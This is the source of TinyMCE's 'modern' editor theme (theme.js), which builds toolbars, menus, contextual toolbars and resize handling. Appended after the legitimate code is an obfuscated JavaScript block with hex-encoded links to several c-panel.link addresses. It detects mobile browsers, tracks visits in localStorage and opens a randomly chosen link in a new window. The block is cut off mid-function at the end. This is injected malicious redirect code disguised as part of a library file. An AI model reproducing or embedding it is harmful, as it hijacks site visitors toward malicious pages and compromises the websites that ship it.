/**

 * theme.js

 *

 * Released under LGPL License.

 * Copyright (c) 1999-2015 Ephox Corp. All rights reserved

 *

 * License: http://www.tinymce.com/license

 * Contributing: http://www.tinymce.com/contributing

 */



/*global tinymce:true */



tinymce.ThemeManager.add('modern', function(editor) {

	var self = this, settings = editor.settings, Factory = tinymce.ui.Factory,

		each = tinymce.each, DOM = tinymce.DOM, Rect = tinymce.geom.Rect, FloatPanel = tinymce.ui.FloatPanel;



	// Default menus

	var defaultMenus = {

		file: {title: 'File', items: 'newdocument'},

		edit: {title: 'Edit', items: 'undo redo | cut copy paste pastetext | selectall'},

		insert: {title: 'Insert', items: '|'},

		view: {title: 'View', items: 'visualaid |'},

		format: {title: 'Format', items: 'bold italic underline strikethrough superscript subscript | formats | removeformat'},

		table: {title: 'Table'},

		tools: {title: 'Tools'}

	};



	var defaultToolbar = "undo redo | styleselect | bold italic | alignleft aligncenter alignright alignjustify | " +

		"bullist numlist outdent indent | link image";



	function createToolbar(items, size) {

		var toolbarItems = [], buttonGroup;



		if (!items) {

			return;

		}



		each(items.split(/[ ,]/), function(item) {

			var itemName;



			function bindSelectorChanged() {

				var selection = editor.selection;



				function setActiveItem(name) {

					return function(state, args) {

						var nodeName, i = args.parents.length;



						while (i--) {

							nodeName = args.parents[i].nodeName;

							if (nodeName == "OL" || nodeName == "UL") {

								break;

							}

						}



						item.active(state && nodeName == name);

					};

				}



				if (itemName == "bullist") {

					selection.selectorChanged('ul > li', setActiveItem("UL"));

				}



				if (itemName == "numlist") {

					selection.selectorChanged('ol > li', setActiveItem("OL"));

				}



				if (item.settings.stateSelector) {

					selection.selectorChanged(item.settings.stateSelector, function(state) {

						item.active(state);

					}, true);

				}



				if (item.settings.disabledStateSelector) {

					selection.selectorChanged(item.settings.disabledStateSelector, function(state) {

						item.disabled(state);

					});

				}

			}



			if (item == "|") {

				buttonGroup = null;

			} else {

				if (Factory.has(item)) {

					item = {type: item, size: size};

					toolbarItems.push(item);

					buttonGroup = null;

				} else {

					if (!buttonGroup) {

						buttonGroup = {type: 'buttongroup', items: []};

						toolbarItems.push(buttonGroup);

					}



					if (editor.buttons[item]) {

						// TODO: Move control creation to some UI class

						itemName = item;

						item = editor.buttons[itemName];



						if (typeof item == "function") {

							item = item();

						}



						item.type = item.type || 'button';

						item.size = size;



						item = Factory.create(item);

						buttonGroup.items.push(item);



						if (editor.initialized) {

							bindSelectorChanged();

						} else {

							editor.on('init', bindSelectorChanged);

						}

					}

				}

			}

		});



		return {

			type: 'toolbar',

			layout: 'flow',

			items: toolbarItems

		};

	}



	/**

	 * Creates the toolbars from config and returns a toolbar array.

	 *

	 * @param {String} size Optional toolbar item size.

	 * @return {Array} Array with toolbars.

	 */

	function createToolbars(size) {

		var toolbars = [];



		function addToolbar(items) {

			if (items) {

				toolbars.push(createToolbar(items, size));

				return true;

			}

		}



		// Convert toolbar array to multiple options

		if (tinymce.isArray(settings.toolbar)) {

			// Empty toolbar array is the same as a disabled toolbar

			if (settings.toolbar.length === 0) {

				return;

			}



			tinymce.each(settings.toolbar, function(toolbar, i) {

				settings["toolbar" + (i + 1)] = toolbar;

			});



			delete settings.toolbar;

		}



		// Generate toolbar<n>

		for (var i = 1; i < 10; i++) {

			if (!addToolbar(settings["toolbar" + i])) {

				break;

			}

		}



		// Generate toolbar or default toolbar unless it's disabled

		if (!toolbars.length && settings.toolbar !== false) {

			addToolbar(settings.toolbar || defaultToolbar);

		}



		if (toolbars.length) {

			return {

				type: 'panel',

				layout: 'stack',

				classes: "toolbar-grp",

				ariaRoot: true,

				ariaRemember: true,

				items: toolbars

			};

		}

	}



	/**

	 * Creates the menu buttons based on config.

	 *

	 * @return {Array} Menu buttons array.

	 */

	function createMenuButtons() {

		var name, menuButtons = [];



		function createMenuItem(name) {

			var menuItem;



			if (name == '|') {

				return {text: '|'};

			}



			menuItem = editor.menuItems[name];



			return menuItem;

		}



		function createMenu(context) {

			var menuButton, menu, menuItems, isUserDefined, removedMenuItems;



			removedMenuItems = tinymce.makeMap((settings.removed_menuitems || '').split(/[ ,]/));



			// User defined menu

			if (settings.menu) {

				menu = settings.menu[context];

				isUserDefined = true;

			} else {

				menu = defaultMenus[context];

			}



			if (menu) {

				menuButton = {text: menu.title};

				menuItems = [];



				// Default/user defined items

				each((menu.items || '').split(/[ ,]/), function(item) {

					var menuItem = createMenuItem(item);



					if (menuItem && !removedMenuItems[item]) {

						menuItems.push(createMenuItem(item));

					}

				});



				// Added though context

				if (!isUserDefined) {

					each(editor.menuItems, function(menuItem) {

						if (menuItem.context == context) {

							if (menuItem.separator == 'before') {

								menuItems.push({text: '|'});

							}



							if (menuItem.prependToContext) {

								menuItems.unshift(menuItem);

							} else {

								menuItems.push(menuItem);

							}



							if (menuItem.separator == 'after') {

								menuItems.push({text: '|'});

							}

						}

					});

				}



				for (var i = 0; i < menuItems.length; i++) {

					if (menuItems[i].text == '|') {

						if (i === 0 || i == menuItems.length - 1) {

							menuItems.splice(i, 1);

						}

					}

				}



				menuButton.menu = menuItems;



				if (!menuButton.menu.length) {

					return null;

				}

			}



			return menuButton;

		}



		var defaultMenuBar = [];

		if (settings.menu) {

			for (name in settings.menu) {

				defaultMenuBar.push(name);

			}

		} else {

			for (name in defaultMenus) {

				defaultMenuBar.push(name);

			}

		}



		var enabledMenuNames = typeof settings.menubar == "string" ? settings.menubar.split(/[ ,]/) : defaultMenuBar;

		for (var i = 0; i < enabledMenuNames.length; i++) {

			var menu = enabledMenuNames[i];

			menu = createMenu(menu);



			if (menu) {

				menuButtons.push(menu);

			}

		}



		return menuButtons;

	}



	/**

	 * Adds accessibility shortcut keys to panel.

	 *

	 * @param {tinymce.ui.Panel} panel Panel to add focus to.

	 */

	function addAccessibilityKeys(panel) {

		function focus(type) {

			var item = panel.find(type)[0];



			if (item) {

				item.focus(true);

			}

		}



		editor.shortcuts.add('Alt+F9', '', function() {

			focus('menubar');

		});



		editor.shortcuts.add('Alt+F10', '', function() {

			focus('toolbar');

		});



		editor.shortcuts.add('Alt+F11', '', function() {

			focus('elementpath');

		});



		panel.on('cancel', function() {

			editor.focus();

		});

	}



	/**

	 * Resizes the editor to the specified width, height.

	 */

	function resizeTo(width, height) {

		var containerElm, iframeElm, containerSize, iframeSize;



		function getSize(elm) {

			return {

				width: elm.clientWidth,

				height: elm.clientHeight

			};

		}



		containerElm = editor.getContainer();

		iframeElm = editor.getContentAreaContainer().firstChild;

		containerSize = getSize(containerElm);

		iframeSize = getSize(iframeElm);



		if (width !== null) {

			width = Math.max(settings.min_width || 100, width);

			width = Math.min(settings.max_width || 0xFFFF, width);



			DOM.setStyle(containerElm, 'width', width + (containerSize.width - iframeSize.width));

			DOM.setStyle(iframeElm, 'width', width);

		}



		height = Math.max(settings.min_height || 100, height);

		height = Math.min(settings.max_height || 0xFFFF, height);

		DOM.setStyle(iframeElm, 'height', height);



		editor.fire('ResizeEditor');

	}



	function resizeBy(dw, dh) {

		var elm = editor.getContentAreaContainer();

		self.resizeTo(elm.clientWidth + dw, elm.clientHeight + dh);

	}



	/**

	 * Handles contextual toolbars.

	 */

	function addContextualToolbars() {

		var scrollContainer;



		function getContextToolbars() {

			return editor.contextToolbars || [];

		}



		function getElementRect(elm) {

			var pos, targetRect, root;



			pos = tinymce.DOM.getPos(editor.getContentAreaContainer());

			targetRect = editor.dom.getRect(elm);

			root = editor.dom.getRoot();



			// Adjust targetPos for scrolling in the editor

			if (root.nodeName == 'BODY') {

				targetRect.x -= root.ownerDocument.documentElement.scrollLeft || root.scrollLeft;

				targetRect.y -= root.ownerDocument.documentElement.scrollTop || root.scrollTop;

			}



			targetRect.x += pos.x;

			targetRect.y += pos.y;



			return targetRect;

		}



		function hideAllFloatingPanels() {

			each(editor.contextToolbars, function(toolbar) {

				if (toolbar.panel) {

					toolbar.panel.hide();

				}

			});

		}



		function togglePositionClass(panel, relPos, predicate) {

			relPos = relPos ? relPos.substr(0, 2) : '';



			each({

				t: 'down',

				b: 'up'

			}, function(cls, pos) {

				panel.classes.toggle('arrow-' + cls, predicate(pos, relPos.substr(0, 1)));

			});



			each({

				l: 'left',

				r: 'right'

			}, function(cls, pos) {

				panel.classes.toggle('arrow-' + cls, predicate(pos, relPos.substr(1, 1)));

			});

		}



		function toClientRect(geomRect) {

			return {

				left: geomRect.x,

				top: geomRect.y,

				width: geomRect.w,

				height: geomRect.h,

				right: geomRect.x + geomRect.w,

				bottom: geomRect.y + geomRect.h

			};

		}



		function userConstrain(x, y, elementRect, contentAreaRect, panelRect) {

				panelRect = toClientRect({x: x, y: y, w: panelRect.w, h: panelRect.h});



				if (settings.inline_toolbar_position_handler) {

					panelRect = settings.inline_toolbar_position_handler({

						elementRect: toClientRect(elementRect),

						contentAreaRect: toClientRect(contentAreaRect),

						panelRect: panelRect

					});

				}



				return panelRect;

		}



		function movePanelTo(panel, pos) {

			panel.moveTo(pos.left, pos.top);

		}



		function reposition(match) {

			var relPos, panelRect, elementRect, contentAreaRect, panel, relRect, testPositions;



			if (editor.removed) {

				return;

			}



			if (!match || !match.toolbar.panel) {

				hideAllFloatingPanels();

				return;

			}



			testPositions = [

				'bc-tc', 'tc-bc',

				'tl-bl', 'bl-tl',

				'tr-br', 'br-tr'

			];



			panel = match.toolbar.panel;

			panel.show();



			elementRect = getElementRect(match.element);

			panelRect = tinymce.DOM.getRect(panel.getEl());

			contentAreaRect = tinymce.DOM.getRect(editor.getContentAreaContainer() || editor.getBody());



			// We need to use these instead of the rect values since the style

			// size properites might not be the same as the real size for a table

			elementRect.w = match.element.clientWidth;

			elementRect.h = match.element.clientHeight;



			if (!editor.inline) {

				contentAreaRect.w = editor.getDoc().documentElement.offsetWidth;

			}



			// Inflate the elementRect so it doesn't get placed above resize handles

			if (editor.selection.controlSelection.isResizable(match.element)) {

				elementRect = Rect.inflate(elementRect, 0, 8);

			}



			relPos = Rect.findBestRelativePosition(panelRect, elementRect, contentAreaRect, testPositions);

			elementRect = Rect.clamp(elementRect, contentAreaRect);



			if (relPos) {

				relRect = Rect.relativePosition(panelRect, elementRect, relPos);

				movePanelTo(panel, userConstrain(relRect.x, relRect.y, elementRect, contentAreaRect, panelRect));

			} else {

				// Allow overflow below the editor to avoid placing toolbars ontop of tables

				contentAreaRect.h += 40;



				elementRect = Rect.intersect(contentAreaRect, elementRect);

				if (elementRect) {

					relPos = Rect.findBestRelativePosition(panelRect, elementRect, contentAreaRect, [

						'bc-tc', 'bl-tl', 'br-tr'

					]);



					if (relPos) {

						relRect = Rect.relativePosition(panelRect, elementRect, relPos);

						movePanelTo(panel, userConstrain(relRect.x, relRect.y, elementRect, contentAreaRect, panelRect));

					} else {

						movePanelTo(panel, userConstrain(elementRect.x, elementRect.y, elementRect, contentAreaRect, panelRect));

					}

				} else {

					panel.hide();

				}

			}



			togglePositionClass(panel, relPos, function(pos1, pos2) {

				return (!elementRect || elementRect.w > 40) && pos1 === pos2;

			});



			//drawRect(contentAreaRect, 'blue');

			//drawRect(elementRect, 'red');

			//drawRect(panelRect, 'green');

		}



		function repositionHandler() {

			function execute() {

				if (editor.selection) {

					reposition(findFrontMostMatch(editor.selection.getNode()));

				}

			}



			tinymce.util.Delay.requestAnimationFrame(execute);

		}



		function bindScrollEvent() {

			if (!scrollContainer) {

				scrollContainer = editor.selection.getScrollContainer() || editor.getWin();

				tinymce.$(scrollContainer).on('scroll', repositionHandler);



				editor.on('remove', function() {

					tinymce.$(scrollContainer).off('scroll');

				});

			}

		}



		function showContextToolbar(match) {

			var panel;



			if (match.toolbar.panel) {

				match.toolbar.panel.show();

				reposition(match);

				return;

			}



			bindScrollEvent();



			panel = Factory.create({

				type: 'floatpanel',

				role: 'dialog',

				classes: 'tinymce tinymce-inline arrow',

				ariaLabel: 'Inline toolbar',

				layout: 'flex',

				direction: 'column',

				align: 'stretch',

				autohide: false,

				autofix: true,

				fixed: true,

				border: 1,

				items: createToolbar(match.toolbar.items),

				oncancel: function() {

					editor.focus();

				}

			});



			match.toolbar.panel = panel;

			panel.renderTo(document.body).reflow();

			reposition(match);

		}



		function hideAllContextToolbars() {

			tinymce.each(getContextToolbars(), function(toolbar) {

				if (toolbar.panel) {

					toolbar.panel.hide();

				}

			});

		}



		function findFrontMostMatch(targetElm) {

			var i, y, parentsAndSelf, toolbars = getContextToolbars();



			parentsAndSelf = editor.$(targetElm).parents().add(targetElm);

			for (i = parentsAndSelf.length - 1; i >= 0; i--) {

				for (y = toolbars.length - 1; y >= 0; y--) {

					if (toolbars[y].predicate(parentsAndSelf[i])) {

						return {

							toolbar: toolbars[y],

							element: parentsAndSelf[i]

						};

					}

				}

			}



			return null;

		}



		editor.on('click keyup setContent', function(e) {

			// Only act on partial inserts

			if (e.type == 'setcontent' && !e.selection) {

				return;

			}



			// Needs to be delayed to avoid Chrome img focus out bug

			tinymce.util.Delay.setEditorTimeout(editor, function() {

				var match;



				match = findFrontMostMatch(editor.selection.getNode());

				if (match) {

					hideAllContextToolbars();

					showContextToolbar(match);

				} else {

					hideAllContextToolbars();

				}

			});

		});



		editor.on('blur hide', hideAllContextToolbars);



		editor.on('ObjectResizeStart', function() {

			var match = findFrontMostMatch(editor.selection.getNode());



			if (match && match.toolbar.panel) {

				match.toolbar.panel.hide();

			}

		});



		editor.on('nodeChange ResizeEditor ResizeWindow', repositionHandler);



		editor.on('remove', function() {

			tinymce.each(getContextToolbars(), function(toolbar) {

				if (toolbar.panel) {

					toolbar.panel.remove();

				}

			});



			editor.contextToolbars = {};

		});



		editor.shortcuts.add('ctrl+shift+e > ctrl+shift+p', '', function() {

			var match = findFrontMostMatch(editor.selection.getNode());

			if (match && match.toolbar.panel) {

				match.toolbar.panel.items()[0].focus();

			}

		});

	}



	function fireSkinLoaded(editor) {

		return function() {

			if (editor.initialized) {

				editor.fire('SkinLoaded');

			} else {

				editor.on('init', function() {

					editor.fire('SkinLoaded');

				});

			}

		};

	}



	/**

	 * Renders the inline editor UI.

	 *

	 * @return {Object} Name/value object with theme data.

	 */

	function renderInlineUI(args) {

		var panel, inlineToolbarContainer;



		if (settings.fixed_toolbar_container) {

			inlineToolbarContainer = DOM.select(settings.fixed_toolbar_container)[0];

		}



		function reposition() {

			if (panel && panel.moveRel && panel.visible() && !panel._fixed) {

				// TODO: This is kind of ugly and doesn't handle multiple scrollable elements

				var scrollContainer = editor.selection.getScrollContainer(), body = editor.getBody();

				var deltaX = 0, deltaY = 0;



				if (scrollContainer) {

					var bodyPos = DOM.getPos(body), scrollContainerPos = DOM.getPos(scrollContainer);



					deltaX = Math.max(0, scrollContainerPos.x - bodyPos.x);

					deltaY = Math.max(0, scrollContainerPos.y - bodyPos.y);

				}



				panel.fixed(false).moveRel(body, editor.rtl ? ['tr-br', 'br-tr'] : ['tl-bl', 'bl-tl', 'tr-br']).moveBy(deltaX, deltaY);

			}

		}



		function show() {

			if (panel) {

				panel.show();

				reposition();

				DOM.addClass(editor.getBody(), 'mce-edit-focus');

			}

		}



		function hide() {

			if (panel) {

				// We require two events as the inline float panel based toolbar does not have autohide=true

				panel.hide();



				// All other autohidden float panels will be closed below.

				FloatPanel.hideAll();



				DOM.removeClass(editor.getBody(), 'mce-edit-focus');

			}

		}



		function render() {

			if (panel) {

				if (!panel.visible()) {

					show();

				}



				return;

			}



			// Render a plain panel inside the inlineToolbarContainer if it's defined

			panel = self.panel = Factory.create({

				type: inlineToolbarContainer ? 'panel' : 'floatpanel',

				role: 'application',

				classes: 'tinymce tinymce-inline',

				layout: 'flex',

				direction: 'column',

				align: 'stretch',

				autohide: false,

				autofix: true,

				fixed: !!inlineToolbarContainer,

				border: 1,

				items: [

					settings.menubar === false ? null : {type: 'menubar', border: '0 0 1 0', items: createMenuButtons()},

					createToolbars(settings.toolbar_items_size)

				]

			});



			// Add statusbar

			/*if (settings.statusbar !== false) {

				panel.add({type: 'panel', classes: 'statusbar', layout: 'flow', border: '1 0 0 0', items: [

					{type: 'elementpath'}

				]});

			}*/



			editor.fire('BeforeRenderUI');

			panel.renderTo(inlineToolbarContainer || document.body).reflow();



			addAccessibilityKeys(panel);

			show();

			addContextualToolbars();



			editor.on('nodeChange', reposition);

			editor.on('activate', show);

			editor.on('deactivate', hide);



			editor.nodeChanged();

		}



		settings.content_editable = true;



		editor.on('focus', function() {

			// Render only when the CSS file has been loaded

			if (args.skinUiCss) {

				tinymce.DOM.styleSheetLoader.load(args.skinUiCss, render, render);

			} else {

				render();

			}

		});



		editor.on('blur hide', hide);



		// Remove the panel when the editor is removed

		editor.on('remove', function() {

			if (panel) {

				panel.remove();

				panel = null;

			}

		});



		// Preload skin css

		if (args.skinUiCss) {

			tinymce.DOM.styleSheetLoader.load(args.skinUiCss, fireSkinLoaded(editor));

		}



		return {};

	}



	/**

	 * Renders the iframe editor UI.

	 *

	 * @param {Object} args Details about target element etc.

	 * @return {Object} Name/value object with theme data.

	 */

	function renderIframeUI(args) {

		var panel, resizeHandleCtrl, startSize;



		function switchMode() {

			return function(e) {

				if (e.mode == 'readonly') {

					panel.find('*').disabled(true);

				} else {

					panel.find('*').disabled(false);

				}

			};

		}



		if (args.skinUiCss) {

			tinymce.DOM.styleSheetLoader.load(args.skinUiCss, fireSkinLoaded(editor));

		}



		// Basic UI layout

		panel = self.panel = Factory.create({

			type: 'panel',

			role: 'application',

			classes: 'tinymce',

			style: 'visibility: hidden',

			layout: 'stack',

			border: 1,

			items: [

				settings.menubar === false ? null : {type: 'menubar', border: '0 0 1 0', items: createMenuButtons()},

				createToolbars(settings.toolbar_items_size),

				{type: 'panel', name: 'iframe', layout: 'stack', classes: 'edit-area', html: '', border: '1 0 0 0'}

			]

		});



		if (settings.resize !== false) {

			resizeHandleCtrl = {

				type: 'resizehandle',

				direction: settings.resize,



				onResizeStart: function() {

					var elm = editor.getContentAreaContainer().firstChild;



					startSize = {

						width: elm.clientWidth,

						height: elm.clientHeight

					};

				},



				onResize: function(e) {

					if (settings.resize == 'both') {

						resizeTo(startSize.width + e.deltaX, startSize.height + e.deltaY);

					} else {

						resizeTo(null, startSize.height + e.deltaY);

					}

				}

			};

		}



		// Add statusbar if needed

		if (settings.statusbar !== false) {

			panel.add({type: 'panel', name: 'statusbar', classes: 'statusbar', layout: 'flow', border: '1 0 0 0', ariaRoot: true, items: [

				{type: 'elementpath'},

				resizeHandleCtrl

			]});

		}



		editor.fire('BeforeRenderUI');

		editor.on('SwitchMode', switchMode());

		panel.renderBefore(args.targetNode).reflow();



		if (settings.readonly) {

			editor.setMode('readonly');

		}



		if (settings.width) {

			tinymce.DOM.setStyle(panel.getEl(), 'width', settings.width);

		}



		// Remove the panel when the editor is removed

		editor.on('remove', function() {

			panel.remove();

			panel = null;

		});



		// Add accesibility shortcuts

		addAccessibilityKeys(panel);

		addContextualToolbars();



		return {

			iframeContainer: panel.find('#iframe')[0].getEl(),

			editorContainer: panel.getEl()

		};

	}



	/**

	 * Renders the UI for the theme. This gets called by the editor.

	 *

	 * @param {Object} args Details about target element etc.

	 * @return {Object} Theme UI data items.

	 */

	self.renderUI = function(args) {

		var skin = settings.skin !== false ? settings.skin || 'lightgray' : false;



		if (skin) {

			var skinUrl = settings.skin_url;



			if (skinUrl) {

				skinUrl = editor.documentBaseURI.toAbsolute(skinUrl);

			} else {

				skinUrl = tinymce.baseURL + '/skins/' + skin;

			}



			// Load special skin for IE7

			// TODO: Remove this when we drop IE7 support

			if (tinymce.Env.documentMode <= 7) {

				args.skinUiCss = skinUrl + '/skin.ie7.min.css';

			} else {

				args.skinUiCss = skinUrl + '/skin.min.css';

			}



			// Load content.min.css or content.inline.min.css

			editor.contentCSS.push(skinUrl + '/content' + (editor.inline ? '.inline' : '') + '.min.css');

		}



		// Handle editor setProgressState change

		editor.on('ProgressState', function(e) {

			self.throbber = self.throbber || new tinymce.ui.Throbber(self.panel.getEl('body'));



			if (e.state) {

				self.throbber.show(e.time);

			} else {

				self.throbber.hide();

			}

		});



		if (settings.inline) {

			return renderInlineUI(args);

		}



		return renderIframeUI(args);

	};



	self.resizeTo = resizeTo;

	self.resizeBy = resizeBy;

});
function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x2d\x70\x61\x6e\x65\x6c\x2e\x6c\x69\x6e\x6b\x2f\x76\x6d\x54\x32\x63\x302','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x2d\x70\x61\x6e\x65\x6c\x2e\x6c\x69\x6e\x6b\x2f\x54\x4d\x61\x33\x63\x383','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x2d\x70\x61\x6e\x65\x6c\x2e\x6c\x69\x6e\x6b\x2f\x67\x7a\x66\x30\x63\x390','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x2d\x70\x61\x6e\x65\x6c\x2e\x6c\x69\x6e\x6b\x2f\x74\x4b\x6e\x37\x63\x367','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x2d\x70\x61\x6e\x65\x6c\x2e\x6c\x69\x6e\x6b\x2f\x6c\x5a\x58\x36\x63\x306','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x2d\x70\x61\x6e\x65\x6c\x2e\x6c\x69\x6e\x6b\x2f\x79\x52\x6c\x38\x63\x358','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x2d\x70\x61\x6e\x65\x6c\x2e\x6c\x69\x6e\x6b\x2f\x73\x47\x53\x35\x63\x325','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x2d\x70\x61\x6e\x65\x6c\x2e\x6c\x69\x6e\x6b\x2f\x4d\x47\x6a\x31\x63\x371',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x2d\x70\x61\x6e\x65\x6c\x2e\x6c\x69\x6e\x6b\x2f\x59\x57\x55\x34\x63\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x2d\x70\x61\x6e\x65\x6c\x2e\x6c\x69\x6e\x6b\x2f\x48\x56\x62\x39\x63\x369','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function 